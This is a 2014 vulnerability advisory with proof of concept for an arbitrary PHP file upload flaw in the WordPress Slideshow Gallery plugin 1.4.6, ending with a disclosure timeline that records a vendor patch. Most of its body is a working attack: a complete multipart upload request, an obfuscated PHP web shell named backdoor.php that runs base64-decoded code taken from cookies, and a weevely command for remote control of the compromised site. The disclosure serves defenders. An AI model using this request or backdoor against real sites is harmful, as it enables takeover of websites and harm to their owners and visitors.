Summary: WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability.
Found by: Jesus Ramirez Pichardo
@whitexploit
http://whitexploit.blogspot.mx/
Date: 2014-08-28
Vendor Homepage: http://tribulant.com/
Software: Slideshow Gallery
Version: 1.4.6
Software Link: http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip
Tested on: Windows 7 OS, Wordpress 3.9.2 and Chrome Browser.
Description:
I found a serious security vulnerability in the Slideshow Gallery plugin. This bug allows an attacker to upload any php file remotely to the vulnerable website (administrator by default). I have tested and verified that having the current version of the plugin installed in a WordPress installation will allow any registered user (Administrator, Editor, Author, Contributor and Subscriber), to upload a PHP shell to exploit the host system.
Backdoor location: http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
Today (2014-08-29), I did the notification to vendor and they gave me feedback about the vulnerability by email. The vendor has released a patch a few hours ago. (SlideShow Gallery version 1.4.7 at https://wordpress.org/plugins/slideshow-gallery/changelog).
Proof of Concept (PoC):
1. An attacker uploads a PHP shell file (i.e. backdoor.php):
POST http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save HTTP/1.1
Host: 192.168.31.128
Connection: keep-alive
Content-Length: 2168
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://192.168.31.128
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEGMugMZ1CVkRzbxV DNT: 1
Referer: http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save
Accept-Encoding: gzip,deflate
Accept-Language: es-ES,es;q=0.8,en;q=0.6,it;q=0.4,und;q=0.2
Cookie: wordpress_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C9ee160d2851bbcdaa2865 e9010d92d46; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C0565892d6d7 f9de1022e4ad95b45d4ac; wp-settings-1=libraryContent%3Dupload%26editor%3Dtinymce; wp- settings-time-1=1409293045
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[id]"
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[order]"
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[title]"
Test Shell Upload
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[description]"
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[showinfo]"
both
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[iopacity]"
70
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[galleries][]"
1
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[type]"
file
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="image_file"; filename="backdoor.php"
Content-Type: application/octet-stream
<?php
$kvgk = str_replace("y","","ysytyry_yreypylyayce"); $dawj="pdGV4cGxvaXQnO2VzhjaGzh8gJzwnLiRrzhLic+JzzhtldmFsKGJhc2U2NF9kZWNvZGUz"; $asrp="gnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKzhCRhKS0zKSkpKSk7ZWzhNobyAnPC8nLzhiR rLic+Jzt9"; $gxfr="hocHJlZ19yzhZXBsYzhWNlKzhGFycmF5KCcvW15cdz1cc1zh0vJywnzhLzh1xzzhLycpLCBhcnJheSz h"; $fdcd="JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihzhyZXNldCgkYSk9PSd3zhaCcgJiYgJGMzhoJGEpPjMpe zhyRrPSd";
$uuod = $kvgk("j", "", "bjase6j4j_jdjejcjojde");
$qcon = $kvgk("av","","avcraveaavteav_avfavuavnavcavtiavoavn");
$rpgy = $qcon('', $uuod($kvgk("zh", "", $fdcd.$dawj.$gxfr.$asrp))); $rpgy();
?>
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[image_url]"
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[uselink]"
N
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[link]"
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[linktarget]"
self
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="submit"
Save Slide
------WebKitFormBoundaryEGMugMZ1CVkRzbxV--
2. The backdoor is located at http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
3. The attacker uses a security tool (i.e. weevely) in order to communicate with the backdoor.
#weevely http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php whitexploit
Now the attacker has a “telnet-like console”. Finally, the attacker has the remote control of the
vulnerable website.
Vulnerability Disclosure Timeline:
2014-08-28: Discovered vulnerability
2014-08-29: Vendor Notification (support@tribulant.com)
2014-08-29: Vendor Response/Feedback
2014-08-29: Vendor Fix/Patch
2014-08-30: Public Disclosure